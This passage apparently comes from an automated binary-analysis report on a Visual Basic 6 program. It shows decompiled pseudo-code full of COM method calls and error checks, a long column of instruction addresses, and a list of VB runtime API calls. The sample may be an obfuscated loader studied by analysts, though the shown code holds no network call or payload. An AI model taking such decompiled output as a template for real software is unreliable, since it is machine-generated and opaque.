					_t1013 =  *((intOrPtr*)( *_v284 + 0xf8))(_v284,  &_v92, _t1009,  *((intOrPtr*)( *((intOrPtr*)( *_v528)) + 0x308))( *_v528));
					asm("fclex");
					_v288 = _t1013;
					if(_v288 >= 0) {
						_v532 = _v532 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x40b19c);
						_push(_v284);
						_push(_v288);
						L004013D8();
						_v532 = _t1013;
					}
					if( *0x410010 != 0) {
						_v536 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v536 = 0x410010;
					}
					_t1017 =  &_v116;
					L004013CC();
					_v292 = _t1017;
					_t1021 =  *((intOrPtr*)( *_v292 + 0x1dc))(_v292,  &_v96, _t1017,  *((intOrPtr*)( *((intOrPtr*)( *_v536)) + 0x308))( *_v536));
					asm("fclex");
					_v296 = _t1021;
					if(_v296 >= 0) {
						_v540 = _v540 & 0x00000000;
					} else {
						_push(0x1dc);
						_push(0x40b19c);
						_push(_v292);
						_push(_v296);
						L004013D8();
						_v540 = _t1021;
					}
					_v144 = 0x85aaa;
					_v152 = 3;
					_v192 = 0x791fc7;
					_v200 = 3;
					_v368 = _v96;
					_v96 = _v96 & 0x00000000;
					_v128 = _v368;
					_v136 = 8;
					_v240 =  *0x401198;
					_v372 = _v92;
					_v92 = _v92 & 0x00000000;
					L0040145C();
					_v256 =  *0x401190;
					_v236 = _v232;
					_v176 = 0x51ddc9;
					_v184 = 3;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v592 =  *0x401188;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_a4 + 0x724))(_a4, 0x10,  &_v236, _v220,  &_v256,  &_v100,  &_v100,  &_v240,  &_v136, 0x10,  &_v152);
					L00401462();
					_push( &_v116);
					_push( &_v112);
					_push( &_v108);
					_push( &_v104);
					_push(4);
					L004013C6();
					_push( &_v152);
					_push( &_v136);
					_push(2);
					L00401432();
					_t1296 = _t1294 + 0x20;
					if( *0x410010 != 0) {
						_v544 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v544 = 0x410010;
					}
					_t1046 =  &_v104;
					L004013CC();
					_v268 = _t1046;
					_t1050 =  *((intOrPtr*)( *_v268 + 0x48))(_v268,  &_v92, _t1046,  *((intOrPtr*)( *((intOrPtr*)( *_v544)) + 0x308))( *_v544));
					asm("fclex");
					_v272 = _t1050;
					if(_v272 >= 0) {
						_v548 = _v548 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40b19c);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v548 = _t1050;
					}
					if( *0x410010 != 0) {
						_v552 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v552 = 0x410010;
					}
					_t1054 =  &_v108;
					L004013CC();
					_v276 = _t1054;
					_t1058 =  *((intOrPtr*)( *_v276 + 0xe8))(_v276,  &_v220, _t1054,  *((intOrPtr*)( *((intOrPtr*)( *_v552)) + 0x318))( *_v552));
					asm("fclex");
					_v280 = _t1058;
					if(_v280 >= 0) {
						_v556 = _v556 & 0x00000000;
					} else {
						_push(0xe8);
						_push(0x40b1ac);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v556 = _t1058;
					}
					if( *0x410010 != 0) {
						_v560 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v560 = 0x410010;
					}
					_t1062 =  &_v112;
					L004013CC();
					_v284 = _t1062;
					_t1066 =  *((intOrPtr*)( *_v284 + 0x58))(_v284,  &_v116, _t1062,  *((intOrPtr*)( *((intOrPtr*)( *_v560)) + 0x31c))( *_v560));
					asm("fclex");
					_v288 = _t1066;
					if(_v288 >= 0) {
						_v564 = _v564 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40b1bc);
						_push(_v284);
						_push(_v288);
						L004013D8();
						_v564 = _t1066;
					}
					_push(0);
					_push(0);
					_push(_v116);
					_push( &_v152);
					L004013BA();
					_t1297 = _t1296 + 0x10;
					if( *0x410010 != 0) {
						_v568 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v568 = 0x410010;
					}
					_t1239 =  *((intOrPtr*)( *_v568));
					_t1071 =  &_v120;
					L004013CC();
					_v292 = _t1071;
					_t1075 =  *((intOrPtr*)( *_v292 + 0x60))(_v292,  &_v232, _t1071,  *((intOrPtr*)(_t1239 + 0x314))( *_v568));
					asm("fclex");
					_v296 = _t1075;
					if(_v296 >= 0) {
						_v572 = _v572 & 0x00000000;
					} else {
						_push(0x60);
						_push(0x40b1ac);
						_push(_v292);
						_push(_v296);
						L004013D8();
						_v572 = _t1075;
					}
					_v240 = _v232;
					_t1077 =  &_v152;
					L004013B4();
					_v236 = _t1077;
					_v376 = _v92;
					_v92 = _v92 & 0x00000000;
					_v128 = _v376;
					_v136 = 8;
					_v264 =  *0x401180;
					_v256 = 0x754c8ed0;
					_v252 = 0x5afc;
					 *_t1297 =  *0x401178;
					_t1088 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4, 0x2e2313c0, 0x5af8,  &_v256,  &_v264,  &_v136, 0x683d, _v220,  &_v236, _t1239, _t1239,  &_v240,  &_v244, _t1077);
					_v300 = _t1088;
					if(_v300 >= 0) {
						_v576 = _v576 & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40ae70);
						_push(_a4);
						_push(_v300);
						L004013D8();
						_v576 = _t1088;
					}
					_v80 = _v244;
					_push( &_v116);
					_push( &_v120);
					_push( &_v112);
					_push( &_v108);
					_push( &_v104);
					_push(5);
					L004013C6();
					_push( &_v152);
					_push( &_v136);
					_push(2);
					L00401432();
					_t1299 = _t1297 + 0x24;
					if( *0x410010 != 0) {
						_v580 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v580 = 0x410010;
					}
					_t1100 =  &_v104;
					L004013CC();
					_v268 = _t1100;
					_t1104 =  *((intOrPtr*)( *_v268 + 0x170))(_v268,  &_v108, _t1100,  *((intOrPtr*)( *((intOrPtr*)( *_v580)) + 0x304))( *_v580));
					asm("fclex");
					_v272 = _t1104;
					if(_v272 >= 0) {
						_v584 = _v584 & 0x00000000;
					} else {
						_push(0x170);
						_push(0x40b19c);
						_push(_v268);
						_push(_v272);
						L004013D8();
						_v584 = _t1104;
					}
					if( *0x410010 != 0) {
						_v588 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v588 = 0x410010;
					}
					_t1108 =  &_v112;
					L004013CC();
					_v276 = _t1108;
					_t1112 =  *((intOrPtr*)( *_v276 + 0x110))(_v276,  &_v232, _t1108,  *((intOrPtr*)( *((intOrPtr*)( *_v588)) + 0x318))( *_v588));
					asm("fclex");
					_v280 = _t1112;
					if(_v280 >= 0) {
						_v592 = _v592 & 0x00000000;
					} else {
						_push(0x110);
						_push(0x40b1ac);
						_push(_v276);
						_push(_v280);
						L004013D8();
						_v592 = _t1112;
					}
					if( *0x410010 != 0) {
						_v596 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v596 = 0x410010;
					}
					_t1116 =  &_v116;
					L004013CC();
					_v284 = _t1116;
					_t1120 =  *((intOrPtr*)( *_v284 + 0x70))(_v284,  &_v236, _t1116,  *((intOrPtr*)( *((intOrPtr*)( *_v596)) + 0x318))( *_v596));
					asm("fclex");
					_v288 = _t1120;
					if(_v288 >= 0) {
						_v600 = _v600 & 0x00000000;
					} else {
						_push(0x70);
						_push(0x40b1ac);
						_push(_v284);
						_push(_v288);
						L004013D8();
						_v600 = _t1120;
					}
					if( *0x410010 != 0) {
						_v604 = 0x410010;
					} else {
						_push("p�i");
						_push(0x40a5bc);
						L004013DE();
						_v604 = 0x410010;
					}
					_t1251 =  *((intOrPtr*)( *_v604));
					_t1124 =  &_v120;
					L004013CC();
					_v292 = _t1124;
					_t1128 =  *((intOrPtr*)( *_v292 + 0x128))(_v292,  &_v240, _t1124,  *((intOrPtr*)(_t1251 + 0x318))( *_v604));
					asm("fclex");
					_v296 = _t1128;
					if(_v296 >= 0) {
						_v608 = _v608 & 0x00000000;
					} else {
						_push(0x128);
						_push(0x40b1ac);
						_push(_v292);
						_push(_v296);
						L004013D8();
						_v608 = _t1128;
					}
					_v248 = _v240;
					_v244 =  *0x401170;
					_v176 = _v232;
					_v184 = 3;
					_v380 = _v108;
					_v108 = _v108 & 0x00000000;
					_v128 = _v380;
					_v136 = 9;
					 *_t1299 = _v236;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *_t1299 =  *0x40116c;
					L004012A0();
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *_a4 + 0x728))(_a4, 0x10, 0x5d72, _t1251, 0x10,  &_v244, _t1251,  &_v248);
					L004013C6();
					_t1294 = _t1299 + 0x14;
					L00401450();
					_t1147 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v136, 4,  &_v104,  &_v112,  &_v116,  &_v120);
					_v268 = _t1147;
					if(_v268 >= 0) {
						_v612 = _v612 & 0x00000000;
					} else {
						_push(0x710);
						_push(0x40ae70);
						_push(_a4);
						_push(_v268);
						L004013D8();
						_v612 = _t1147;
					}
					L004013C0();
					_push( &_v332);
					_push( &_v316);
					_t1150 =  &_v40;
					_push(_t1150);
					L004013A8();
					_v364 = _t1150;
				}
				 *((intOrPtr*)( *_a4 + 0x714))(_a4);
				_v8 = 0;
				asm("wait");
				_push(E0040DC93);
				_push( &_v332);
				_t1155 =  &_v316;
				_push(_t1155);
				_push(2);
				L00401432();
				L00401450();
				L00401450();
				L00401450();
				return _t1155;
			}

0x0040c0ed
0x0040c0fc
0x0040c108
0x0040c110
0x0040c113
0x0040c120
0x0040c129
0x0040c134
0x0040c137
0x0040c141
0x0040c157
0x0040c162
0x0040c169
0x0040c16a
0x0040c16f
0x0040c179
0x0040c189
0x0040c18a
0x0040c190
0x0040c191
0x0040c196
0x0040c1a3
0x0040c1aa
0x0040c1ab
0x0040c1ad
0x0040c1b2
0x0040c1be
0x0040c1cb
0x0040c1e8
0x0040c1cd
0x0040c1cd
0x0040c1d2
0x0040c1d7
0x0040c1dc
0x0040c1dc
0x0040c1fa
0x0040c212
0x0040c215
0x0040c217
0x0040c224
0x0040c246
0x0040c226
0x0040c226
0x0040c228
0x0040c22d
0x0040c233
0x0040c239
0x0040c23e
0x0040c23e
0x0040c250
0x0040c26d
0x0040c270
0x0040c272
0x0040c27f
0x0040c2a1
0x0040c281
0x0040c281
0x0040c283
0x0040c288
0x0040c28e
0x0040c294
0x0040c299
0x0040c299
0x0040c2af
0x0040c2b6
0x0040c2b6
0x0040c2c2
0x0040c2df
0x0040c2c4
0x0040c2c4
0x0040c2c9
0x0040c2ce
0x0040c2d3
0x0040c2d3
0x0040c303
0x0040c307
0x0040c30c
0x0040c324
0x0040c327
0x0040c329
0x0040c336
0x0040c358
0x0040c338
0x0040c338
0x0040c33a
0x0040c33f
0x0040c345
0x0040c34b
0x0040c350
0x0040c350
0x0040c366
0x0040c383
0x0040c368
0x0040c368
0x0040c36d
0x0040c372
0x0040c377
0x0040c377
0x0040c3a7
0x0040c3ab
0x0040c3b0
0x0040c3c8
0x0040c3cb
0x0040c3cd
0x0040c3da
0x0040c3fc
0x0040c3dc
0x0040c3dc
0x0040c3de
0x0040c3e3
0x0040c3e9
0x0040c3ef
0x0040c3f4
0x0040c3f4
0x0040c40a
0x0040c427
0x0040c40c
0x0040c40c
0x0040c411
0x0040c416
0x0040c41b
0x0040c41b
0x0040c441
0x0040c44b
0x0040c44f
0x0040c454
0x0040c46f
0x0040c475
0x0040c477
0x0040c484
0x0040c4a9
0x0040c486
0x0040c486
0x0040c48b
0x0040c490
0x0040c496
0x0040c49c
0x0040c4a1
0x0040c4a1
0x0040c4b3
0x0040c4b9
0x0040c4c3
0x0040c4c6
0x0040c4de
0x0040c4eb
0x0040c4ec
0x0040c4ed
0x0040c4ee
0x0040c4f7
0x0040c505
0x0040c50b
0x0040c518
0x0040c53a
0x0040c51a
0x0040c51a
0x0040c51f
0x0040c524
0x0040c527
0x0040c52d
0x0040c532
0x0040c532
0x0040c544
0x0040c54c
0x0040c550
0x0040c554
0x0040c555
0x0040c557
0x0040c55c
0x0040c565
0x0040c571
0x0040c58e
0x0040c573
0x0040c573
0x0040c578
0x0040c57d
0x0040c582
0x0040c582
0x0040c5b2
0x0040c5b6
0x0040c5bb
0x0040c5d3
0x0040c5d9
0x0040c5db
0x0040c5e8
0x0040c60d
0x0040c5ea
0x0040c5ea
0x0040c5ef
0x0040c5f4
0x0040c5fa
0x0040c600
0x0040c605
0x0040c605
0x0040c61b
0x0040c638
0x0040c61d
0x0040c61d
0x0040c622
0x0040c627
0x0040c62c
0x0040c62c
0x0040c65c
0x0040c660
0x0040c665
0x0040c67d
0x0040c680
0x0040c682
0x0040c68f
0x0040c6b1
0x0040c691
0x0040c691
0x0040c693
0x0040c698
0x0040c69e
0x0040c6a4
0x0040c6a9
0x0040c6a9
0x0040c6bf
0x0040c6dc
0x0040c6c1
0x0040c6c1
0x0040c6c6
0x0040c6cb
0x0040c6d0
0x0040c6d0
0x0040c700
0x0040c704
0x0040c709
0x0040c724
0x0040c72a
0x0040c72c
0x0040c739
0x0040c75e
0x0040c73b
0x0040c73b
0x0040c740
0x0040c745
0x0040c74b
0x0040c751
0x0040c756
0x0040c756
0x0040c76c
0x0040c789
0x0040c76e
0x0040c76e
0x0040c773
0x0040c778
0x0040c77d
0x0040c77d
0x0040c7a3
0x0040c7ad
0x0040c7b1
0x0040c7b6
0x0040c7ce
0x0040c7d4
0x0040c7d6
0x0040c7e3
0x0040c808
0x0040c7e5
0x0040c7e5
0x0040c7ea
0x0040c7ef
0x0040c7f5
0x0040c7fb
0x0040c800
0x0040c800
0x0040c812
0x0040c818
0x0040c822
0x0040c828
0x0040c832
0x0040c83c
0x0040c846
0x0040c850
0x0040c860
0x0040c86a
0x0040c870
0x0040c87a
0x0040c880
0x0040c88d
0x0040c893
0x0040c89d
0x0040c8a0
0x0040c8b4
0x0040c8c1
0x0040c8c2
0x0040c8c3
0x0040c8c4
0x0040c8df
0x0040c8ec
0x0040c8f9
0x0040c8fa
0x0040c8fb
0x0040c8fc
0x0040c90c
0x0040c924
0x0040c943
0x0040c948
0x0040c95a
0x0040c969
0x0040c975
0x0040c992
0x0040c977
0x0040c977
0x0040c97c
0x0040c981
0x0040c986
0x0040c986
0x0040c9ac
0x0040c9b6
0x0040c9ba
0x0040c9bf
0x0040c9d7
0x0040c9da
0x0040c9dc
0x0040c9e9
0x0040ca0b
0x0040c9eb
0x0040c9eb
0x0040c9ed
0x0040c9f2
0x0040c9f8
0x0040c9fe
0x0040ca03
0x0040ca03
0x0040ca12
0x0040ca1c
0x0040ca26
0x0040ca2f
0x0040ca39
0x0040ca46
0x0040ca4c
0x0040ca56
0x0040ca59
0x0040ca77
0x0040ca84
0x0040ca85
0x0040ca86
0x0040ca87
0x0040ca9b
0x0040caa1
0x0040caae
0x0040caaf
0x0040cab0
0x0040cab1
0x0040cab5
0x0040cac2
0x0040cac3
0x0040cac4
0x0040cac5
0x0040cace
0x0040cad4
0x0040cae1
0x0040cb03
0x0040cae3
0x0040cae3
0x0040cae8
0x0040caed
0x0040caf0
0x0040caf6
0x0040cafb
0x0040cafb
0x0040cb10
0x0040cb16
0x0040cb21
0x0040cb2d
0x0040cb4a
0x0040cb2f
0x0040cb2f
0x0040cb34
0x0040cb39
0x0040cb3e
0x0040cb3e
0x0040cb6e
0x0040cb72
0x0040cb77
0x0040cb92
0x0040cb98
0x0040cb9a
0x0040cba7
0x0040cbcc
0x0040cba9
0x0040cba9
0x0040cbae
0x0040cbb3
0x0040cbb9
0x0040cbbf
0x0040cbc4
0x0040cbc4
0x0040cbda
0x0040cbf7
0x0040cbdc
0x0040cbdc
0x0040cbe1
0x0040cbe6
0x0040cbeb
0x0040cbeb
0x0040cc1b
0x0040cc1f
0x0040cc24
0x0040cc3f
0x0040cc45
0x0040cc47
0x0040cc54
0x0040cc79
0x0040cc56
0x0040cc56
0x0040cc5b
0x0040cc60
0x0040cc66
0x0040cc6c
0x0040cc71
0x0040cc71
0x0040cc87
0x0040cca4
0x0040cc89
0x0040cc89
0x0040cc8e
0x0040cc93
0x0040cc98
0x0040cc98
0x0040ccc8
0x0040cccc
0x0040ccd1
0x0040ccec
0x0040ccf2
0x0040ccf4
0x0040cd01
0x0040cd26
0x0040cd03
0x0040cd03
0x0040cd08
0x0040cd0d
0x0040cd13
0x0040cd19
0x0040cd1e
0x0040cd1e
0x0040cd34
0x0040cd51
0x0040cd36
0x0040cd36
0x0040cd3b
0x0040cd40
0x0040cd45
0x0040cd45
0x0040cd6b
0x0040cd75
0x0040cd79
0x0040cd7e
0x0040cd96
0x0040cd9c
0x0040cd9e
0x0040cdab
0x0040cdd0
0x0040cdad
0x0040cdad
0x0040cdb2
0x0040cdb7
0x0040cdbd
0x0040cdc3
0x0040cdc8
0x0040cdc8
0x0040cde5
0x0040cdea
0x0040cded
0x0040cdf4
0x0040cdf9
0x0040cdff
0x0040ce0f
0x0040ce2e
0x0040ce5e
0x0040ce64
0x0040ce71
0x0040ce93
0x0040ce73
0x0040ce73
0x0040ce78
0x0040ce7d
0x0040ce80
0x0040ce86
0x0040ce8b
0x0040ce8b
0x0040ceb0
0x0040ceb5
0x0040cebe
0x0040cecb
0x0040ced1
0x0040ced3
0x0040cee0
0x0040cf02
0x0040cee2
0x0040cee2
0x0040cee7
0x0040ceec
0x0040ceef
0x0040cef5
0x0040cefa
0x0040cefa
0x0040cf09
0x0040cf13
0x0040cf1d
0x0040cf27
0x0040cf31
0x0040cf38
0x0040cf48
0x0040cf4f
0x0040cf56
0x0040cf5d
0x0040cf64
0x0040cf65
0x0040cf68
0x0040cf69
0x0040cf6e
0x0040dbe4
0x0040cf79
0x0040cf83
0x0040cf99
0x0040cfa4
0x0040cfaa
0x0040cfb4
0x0040cfe5
0x0040cfeb
0x0040cff8
0x0040d01a
0x0040cffa
0x0040cffa
0x0040cfff
0x0040d004
0x0040d007
0x0040d00d
0x0040d012
0x0040d012
0x0040d027
0x0040d033
0x0040d050
0x0040d035
0x0040d035
0x0040d03a
0x0040d03f
0x0040d044
0x0040d044
0x0040d074
0x0040d078
0x0040d07d
0x0040d098
0x0040d09b
0x0040d09d
0x0040d0aa
0x0040d0cc
0x0040d0ac
0x0040d0ac
0x0040d0ae
0x0040d0b3
0x0040d0b9
0x0040d0bf
0x0040d0c4
0x0040d0c4
0x0040d0da
0x0040d0f7
0x0040d0dc
0x0040d0dc
0x0040d0e1
0x0040d0e6
0x0040d0eb
0x0040d0eb
0x0040d11b
0x0040d11f
0x0040d124
0x0040d13f
0x0040d145
0x0040d147
0x0040d154
0x0040d179
0x0040d156
0x0040d156
0x0040d15b
0x0040d160
0x0040d166
0x0040d16c
0x0040d171
0x0040d171
0x0040d187
0x0040d1a4
0x0040d189
0x0040d189
0x0040d18e
0x0040d193
0x0040d198
0x0040d198
0x0040d1c8
0x0040d1cc
0x0040d1d1
0x0040d1e9
0x0040d1ef
0x0040d1f1
0x0040d1fe
0x0040d223
0x0040d200
0x0040d200
0x0040d205
0x0040d20a
0x0040d210
0x0040d216
0x0040d21b
0x0040d21b
0x0040d231
0x0040d24e
0x0040d233
0x0040d233
0x0040d238
0x0040d23d
0x0040d242
0x0040d242
0x0040d272
0x0040d276
0x0040d27b
0x0040d293
0x0040d299
0x0040d29b
0x0040d2a8
0x0040d2cd
0x0040d2aa
0x0040d2aa
0x0040d2af
0x0040d2b4
0x0040d2ba
0x0040d2c0
0x0040d2c5
0x0040d2c5
0x0040d2d4
0x0040d2de
0x0040d2e8
0x0040d2f2
0x0040d2ff
0x0040d305
0x0040d30f
0x0040d312
0x0040d322
0x0040d32b
0x0040d331
0x0040d33e
0x0040d349
0x0040d355
0x0040d35b
0x0040d365
0x0040d379
0x0040d386
0x0040d387
0x0040d388
0x0040d389
0x0040d3a3
0x0040d3bd
0x0040d3ca
0x0040d3cb
0x0040d3cc
0x0040d3cd
0x0040d3d6
0x0040d3df
0x0040d3e7
0x0040d3eb
0x0040d3ef
0x0040d3f3
0x0040d3f4
0x0040d3f6
0x0040d404
0x0040d40b
0x0040d40c
0x0040d40e
0x0040d413
0x0040d41d
0x0040d43a
0x0040d41f
0x0040d41f
0x0040d424
0x0040d429
0x0040d42e
0x0040d42e
0x0040d45e
0x0040d462
0x0040d467
0x0040d47f
0x0040d482
0x0040d484
0x0040d491
0x0040d4b3
0x0040d493
0x0040d493
0x0040d495
0x0040d49a
0x0040d4a0
0x0040d4a6
0x0040d4ab
0x0040d4ab
0x0040d4c1
0x0040d4de
0x0040d4c3
0x0040d4c3
0x0040d4c8
0x0040d4cd
0x0040d4d2
0x0040d4d2
0x0040d502
0x0040d506
0x0040d50b
0x0040d526
0x0040d52c
0x0040d52e
0x0040d53b
0x0040d560
0x0040d53d
0x0040d53d
0x0040d542
0x0040d547
0x0040d54d
0x0040d553
0x0040d558
0x0040d558
0x0040d56e
0x0040d58b
0x0040d570
0x0040d570
0x0040d575
0x0040d57a
0x0040d57f
0x0040d57f
0x0040d5af
0x0040d5b3
0x0040d5b8
0x0040d5d0
0x0040d5d3
0x0040d5d5
0x0040d5e2
0x0040d604
0x0040d5e4
0x0040d5e4
0x0040d5e6
0x0040d5eb
0x0040d5f1
0x0040d5f7
0x0040d5fc
0x0040d5fc
0x0040d60b
0x0040d60d
0x0040d60f
0x0040d618
0x0040d619
0x0040d61e
0x0040d628
0x0040d645
0x0040d62a
0x0040d62a
0x0040d62f
0x0040d634
0x0040d639
0x0040d639
0x0040d65f
0x0040d669
0x0040d66d
0x0040d672
0x0040d68d
0x0040d690
0x0040d692
0x0040d69f
0x0040d6c1
0x0040d6a1
0x0040d6a1
0x0040d6a3
0x0040d6a8
0x0040d6ae
0x0040d6b4
0x0040d6b9
0x0040d6b9
0x0040d6ce
0x0040d6d4
0x0040d6db
0x0040d6e0
0x0040d6e9
0x0040d6ef
0x0040d6f9
0x0040d6fc
0x0040d70c
0x0040d712
0x0040d71c
0x0040d73c
0x0040d778
0x0040d77e
0x0040d78b
0x0040d7ad
0x0040d78d
0x0040d78d
0x0040d792
0x0040d797
0x0040d79a
0x0040d7a0
0x0040d7a5
0x0040d7a5
0x0040d7ba
0x0040d7c0
0x0040d7c4
0x0040d7c8
0x0040d7cc
0x0040d7d0
0x0040d7d1
0x0040d7d3
0x0040d7e1
0x0040d7e8
0x0040d7e9
0x0040d7eb
0x0040d7f0
0x0040d7fa
0x0040d817
0x0040d7fc
0x0040d7fc
0x0040d801
0x0040d806
0x0040d80b
0x0040d80b
0x0040d83b
0x0040d83f
0x0040d844
0x0040d85c
0x0040d862
0x0040d864
0x0040d871
0x0040d896
0x0040d873
0x0040d873
0x0040d878
0x0040d87d
0x0040d883
0x0040d889
0x0040d88e
0x0040d88e
0x0040d8a4
0x0040d8c1
0x0040d8a6
0x0040d8a6
0x0040d8ab
0x0040d8b0
0x0040d8b5
0x0040d8b5
0x0040d8e5
0x0040d8e9
0x0040d8ee
0x0040d909
0x0040d90f
0x0040d911
0x0040d91e
0x0040d943
0x0040d920
0x0040d920
0x0040d925
0x0040d92a
0x0040d930
0x0040d936
0x0040d93b
0x0040d93b
0x0040d951
0x0040d96e
0x0040d953
0x0040d953
0x0040d958
0x0040d95d
0x0040d962
0x0040d962
0x0040d992
0x0040d996
0x0040d99b
0x0040d9b6
0x0040d9b9
0x0040d9bb
0x0040d9c8
0x0040d9ea
0x0040d9ca
0x0040d9ca
0x0040d9cc
0x0040d9d1
0x0040d9d7
0x0040d9dd
0x0040d9e2
0x0040d9e2
0x0040d9f8
0x0040da15
0x0040d9fa
0x0040d9fa
0x0040d9ff
0x0040da04
0x0040da09
0x0040da09
0x0040da2f
0x0040da39
0x0040da3d
0x0040da42
0x0040da5d
0x0040da63
0x0040da65
0x0040da72
0x0040da97
0x0040da74
0x0040da74
0x0040da79
0x0040da7e
0x0040da84
0x0040da8a
0x0040da8f
0x0040da8f
0x0040daa4
0x0040dab0
0x0040dabc
0x0040dac2
0x0040dacf
0x0040dad5
0x0040dadf
0x0040dae2
0x0040dafa
0x0040db07
0x0040db14
0x0040db15
0x0040db16
0x0040db17
0x0040db1f
0x0040db2a
0x0040db37
0x0040db38
0x0040db39
0x0040db3a
0x0040db43
0x0040db5b
0x0040db60
0x0040db69
0x0040db7d
0x0040db83
0x0040db90
0x0040dbb2
0x0040db92
0x0040db92
0x0040db97
0x0040db9c
0x0040db9f
0x0040dba5
0x0040dbaa
0x0040dbaa
0x0040dbc2
0x0040dbcd
0x0040dbd4
0x0040dbd5
0x0040dbd8
0x0040dbd9
0x0040dbde
0x0040dbde
0x0040dbf9
0x0040dbff
0x0040dc06
0x0040dc07
0x0040dc68
0x0040dc69
0x0040dc6f
0x0040dc70
0x0040dc72
0x0040dc7d
0x0040dc85
0x0040dc8d
0x0040dc92

APIs

__vbaChkstk.MSVBVM60(?,004012A6), ref: 0040C108
__vbaVarDup.MSVBVM60 ref: 0040C157
#543.MSVBVM60(?,?), ref: 0040C16A
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 0040C191
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0040C1AD
__vbaNew2.MSVBVM60(0040B17C,004103C4,?,?,004012A6), ref: 0040C1D7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B16C,0000001C), ref: 0040C239
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000064), ref: 0040C294
__vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000064), ref: 0040C2B6
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,004012A6), ref: 0040C2CE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C307
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000048), ref: 0040C34B
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040C372
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C3AB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,00000048), ref: 0040C3EF
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040C416
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C44F
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1BC,000000E8), ref: 0040C49C
__vbaChkstk.MSVBVM60(00514F93,?), ref: 0040C4DE
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE70,000006FC,?,?,00514F93,?), ref: 0040C52D
__vbaFreeStr.MSVBVM60(?,?,00514F93,?), ref: 0040C544
__vbaFreeObjList.MSVBVM60(00000003,?,?,?,?,?,00514F93,?), ref: 0040C557
__vbaFreeVar.MSVBVM60(?,?,?,?,?,?,004012A6), ref: 0040C565
__vbaNew2.MSVBVM60(0040A5BC,pi,?,?,?,?,?,?,004012A6), ref: 0040C57D
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C5B6
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1AC,000000F0), ref: 0040C600
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040C627
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C660
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B1BC,00000048), ref: 0040C6A4
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040C6CB
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C704
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000128), ref: 0040C751
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040C778
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C7B1
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,000001DC), ref: 0040C7FB
__vbaChkstk.MSVBVM60(00000008), ref: 0040C8B4
__vbaChkstk.MSVBVM60(?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C8EC
__vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,000017DD,Underbevidsthed,003554E3,00000008), ref: 0040C924
__vbaFreeVarList.MSVBVM60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C943
__vbaVarMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004012A6), ref: 0040C969
__vbaNew2.MSVBVM60(0040A5BC,pi), ref: 0040C981
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C9BA
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B19C,00000048), ref: 0040C9FE
__vbaChkstk.MSVBVM60(667A4DB0,00005B07,?), ref: 0040CA77
__vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAA1
__vbaChkstk.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAB5
__vbaHresultCheckObj.MSVBVM60(00000000,004011C8,0040AE70,00000700,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CAF6
__vbaFreeObj.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB16
__vbaFreeVar.MSVBVM60(?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB21
__vbaNew2.MSVBVM60(0040A5BC,pi,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB39
__vbaObjSet.MSVBVM60(?,00000000,?,000074C1,000039FF,667A4DB0,00005B07,?), ref: 0040CB72
